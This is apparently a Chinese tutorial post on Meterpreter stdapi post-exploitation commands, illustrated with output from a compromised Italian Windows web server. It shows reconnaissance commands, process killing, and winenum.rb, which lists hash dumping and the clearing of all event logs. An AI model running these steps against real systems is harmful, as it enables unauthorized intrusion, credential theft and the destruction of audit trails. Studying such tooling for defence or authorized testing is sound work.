原文链接:Meterpreter stdapi实战应用
0x01 前言 Date/time:2017年,测试一台意大利Windows服务器时发现自己上传cmd.exe文件后只能执行set命令,而以下一些命令都执行不了,猜测应该是这些系统程序被管理员删除或降权了。进去以后发现确实是被降权了,但Administrators和SYSTEM权限下是可以执行的。
- whoami、net、netstat、tasklist、taskkill、systeminfo、ipconfig、arp、cscript...等
复制代码
根据常规思路可以自己上传这些命令的系统程序到可读/写目录,然后执行命令即可。但笔者在渗透中常用到Metasploit,所以就讲下Meterpreter网络命令,也是因为运行了EXP、Lcx.exe等程序暂时无法在中国菜刀直接结束进程和删除文件。
注:使用Meterpreter时可以不用上传相关系统程序(C:\Windows\system32\)到可读/写目录中就能执行部分cmd命令,权限为:SERVIZIO DI RETE。Meterpreter对应的一些命令如下!
0x02 stdapi实战应用过程 stdapi简介:
stdapi是Meterpreter里的其中一个拓展,获取Meterpreter会话时默认就已经加载了,无需再手动加载,可通过load/use -l命令查看所有拓展。stdapi命令功能有:文件读写、上传下载、目录切换、截屏、摄像头、键盘记录、系统相关命令等。 - winenum.rb:/usr/share/metasploit-framework/scripts/meterpreter/winenum.rb
- Stdapi:/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/
- https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi
复制代码
(1) getuid = whoami
- meterpreter > getuid
- Server username: NT AUTHORITY\SERVIZIO DI RETE
复制代码 (2) kill = taskkill
- meterpreter > kill 3268
- Killing: 3268
复制代码 (3) sysinfo = systeminfo
- meterpreter > sysinfo
- Computer : WEBBY01
- OS : Windows .NET Server (Build 3790, Service Pack 2).
- Architecture : x86
- System Language : it_IT
- Meterpreter : x86/win32
复制代码 (4) arp = arp
- meterpreter > arp
- ARP cache
- =========
- IP address MAC address Interface
- ---------- ----------- ---------
- 10.10.10.190 00:0x:5a:11:21:69 65540
- 10.10.10.207 00:0x:29:ab:af:e6 65540
- 93.6*.1*8.1 00:2x:97:fe:71:e1 65539
- 93.*3.1*8.17 00:0x:29:b6:62:ff 65539
复制代码 (5) ipconfig = ipconfig/ifconfig
- meterpreter > ifconfig
- Interface 1
- ============
- Name : MS TCP Loopback
- Hardware MAC : 00:00:00:00:00:00
- MTU : 1520
- IPv4 Address : 127.0.0.1
- Interface 65539
- ============
- Name : VMware Accelerated AMD PCNet Adapter #
- Hardware MAC : 00:0c:29:70:34:2b
- MTU : 1500
- IPv4 Address : 93.**.***.12
- IPv4 Netmask : 255.255.255.0
- IPv4 Address : 93.**.***.12
- IPv4 Netmask : 255.255.255.0
- Interface 65540
- ============
- Name : VMware Accelerated AMD PCNet Adapter
- Hardware MAC : 00:0c:29:70:34:21
- MTU : 1500
- IPv4 Address : 10.10.10.26
- IPv4 Netmask : 255.255.255.0
复制代码 (6) netstat = netstat
- meterpreter > netstat -an
- Connection list
- ===============
- Proto Local address Remote address State User Inode PID/Program name
- ----- ------------- -------------- ----- ---- ----- ----------------
- tcp 0.0.0.0:21 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
- tcp 0.0.0.0:23 0.0.0.0:* LISTEN 0 0 1716/tlntsvr.exe
- tcp 0.0.0.0:25 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
- tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System
- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 700/svchost.exe
- tcp 0.0.0.0:443 0.0.0.0:* LISTEN 0 0 4/System
- tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
- tcp 0.0.0.0:1025 0.0.0.0:* LISTEN 0 0 464/lsass.exe
- tcp 0.0.0.0:1026 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
- tcp 0.0.0.0:1027 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
- tcp 0.0.0.0:1028 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
- tcp 0.0.0.0:1113 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
- tcp 0.0.0.0:1433 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
- tcp 0.0.0.0:3306 0.0.0.0:* LISTEN 0 0 1504/mysqld-nt.exe
- tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 2280/svchost.exe
- tcp 10.10.10.26:139 0.0.0.0:* LISTEN 0 0 4/System
- tcp 93.**.***.12:139 0.0.0.0:* LISTEN 0 0 4/System
- tcp 127.0.0.1:1031 0.0.0.0:* LISTEN 0 0 2380/alg.exe
- tcp 10.10.10.26:1433 10.10.10.26:2767 ESTABLISHED 0 0 1316/sqlservr.exe
- tcp 10.10.10.26:2773 10.10.10.26:1433 ESTABLISHED 0 0 2768/w3wp.exe
- ...SNIP...
- udp 0.0.0.0:4500 0.0.0.0:* 0 0 464/lsass.exe
- udp 0.0.0.0:500 0.0.0.0:* 0 0 464/lsass.exe
- udp 0.0.0.0:445 0.0.0.0:* 0 0 4/System
- udp 0.0.0.0:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
- udp 10.10.10.26:138 0.0.0.0:* 0 0 4/System
- udp 10.10.10.26:137 0.0.0.0:* 0 0 4/System
- udp 10.10.10.26:123 0.0.0.0:* 0 0 792/svchost.exe
- udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
- udp 93.**.***.12:138 0.0.0.0:* 0 0 4/System
- udp 93.**.***.12:137 0.0.0.0:* 0 0 4/System
- udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
- udp 127.0.0.1:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
- udp 127.0.0.1:123 0.0.0.0:* 0 0 792/svchost.exe
- udp 127.0.0.1:3626 0.0.0.0:* 0 0 4028/w3wp.exe
- ...SNIP...
复制代码 (7) ps = tasklist
- meterpreter > ps
- Process List
- ============
- PID PPID Name Arch Session User Path
- --- ---- ---- ---- ------- ---- ----
- 0 0 [System Process] 4294967295
- 4 0 System 4294967295
- 332 4 smss.exe 4294967295
- 380 332 csrss.exe 4294967295
- 404 332 winlogon.exe 4294967295
- 452 404 services.exe 4294967295
- 464 404 lsass.exe 4294967295
- 620 452 svchost.exe 4294967295
- 956 452 spoolsv.exe 4294967295
- 996 452 msdtc.exe 4294967295
- 1152 452 cisvc.exe 4294967295
- 1184 3268 443.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\RECYCLER\443.exe
- 1212 452 svchost.exe 4294967295
- 1284 452 inetinfo.exe 4294967295
- 1316 452 sqlservr.exe 4294967295
- 1456 2652 TreeSize.exe 4294967295
- 1504 452 mysqld-nt.exe 4294967295
- 1548 452 svchost.exe 4294967295
- 1588 452 sqlwriter.exe 4294967295
- 1716 452 tlntsvr.exe 4294967295
- 1756 452 vmtoolsd.exe 4294967295
- 1796 3340 explorer.exe 4294967295
- 1892 452 svchost.exe 4294967295
- 1912 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
- 1960 452 svchost.exe 4294967295
- 2280 452 svchost.exe 4294967295
- 2380 452 alg.exe 4294967295
- 2596 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
- 2652 1796 TreeSize.exe 4294967295
- 2760 452 svchost.exe 4294967295
- 2768 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
- 3084 1152 cidaemon.exe 4294967295
- 3216 3152 vmtoolsd.exe 4294967295
- 3228 3152 ctfmon.exe 4294967295
- 3236 3152 DesktopInfo.exe 4294967295
- 3260 1152 cidaemon.exe 4294967295
- 3268 4028 cmd.scr x86 0 C:\RECYCLER\cmd.scr
- 3340 3152 taskmgr.exe 4294967295
- 4028 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
复制代码 (8) run winenum.rbhttps://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/winenum.rb
- meterpreter > run winenum.rb
- [*] Running Windows Local Enumeration Meterpreter Script
- [*] New session on 93.**.***.12:1998...
- [*] Saving general report to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233/WEBBY01_20150207.0233.txt
- [*] Output of each individual command is saved to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233
- [*] Checking if WEBBY01 is a Virtual Machine ........
- [*] This is a VMware Workstation/Fusion Virtual Machine
- [*] UAC is Disabled
- [*] Running Command List ...
- [*] running command ipconfig /all
- [*] running command ipconfig /displaydns
- [*] running command arp -a
- [*] running command net view
- [*] running command netstat -nao
- [*] running command netstat -vb
- [*] running command netstat -ns
- [*] running command cmd.exe /c set
- [*] running command route print
- [*] running command net accounts
- [*] running command net session
- [*] running command net user
- [*] running command net localgroup
- [*] running command net localgroup administrators
- [*] running command net group administrators
- [*] running command net share
- [*] running command net group
- [*] running command net view /domain
- [*] running command tasklist /svc
- [*] running command netsh firewall show config
- [*] running command gpresult /SCOPE COMPUTER /Z
- [*] running command gpresult /SCOPE USER /Z
- [*] Running WMIC Commands ....
- [*] running command wmic useraccount list
- [*] running command wmic group list
- [*] running command wmic netlogin get name,lastlogon,badpasswordcount
- [*] running command wmic service list brief
- [*] running command wmic logicaldisk get description,filesystem,name,size
- [*] running command wmic volume list brief
- [*] running command wmic netclient list brief
- [*] running command wmic netuse get name,username,connectiontype,localname
- [*] running command wmic share get name,path
- [*] running command wmic nteventlog get path,filename,writeable
- [*] running command wmic startup list full
- [*] running command wmic product get name,version
- [*] running command wmic rdtoggle list
- [*] running command wmic qfe
- [*] Extracting software list from registry
- ...SNIP...
复制代码 winenum.rb脚本功能:(有兴趣的可以自己看下代码做些小修改!)
- 检查目标机器是否为VMware虚拟机、UAC(用户帐户控制)Disabled/Enabled ?
- PID进程迁移(migrate)、执行列表中的DOS、WMIC、Netsh命令,以字符串形式返回。
- incognito列出可用tokens(令牌)、获取系统NTLM(哈希)、导出目标机器注册表、提取注册表里的软件列表。
- 清除所有事件日志(security,system,application,directory service,dns server,file replication service)。
复制代码
|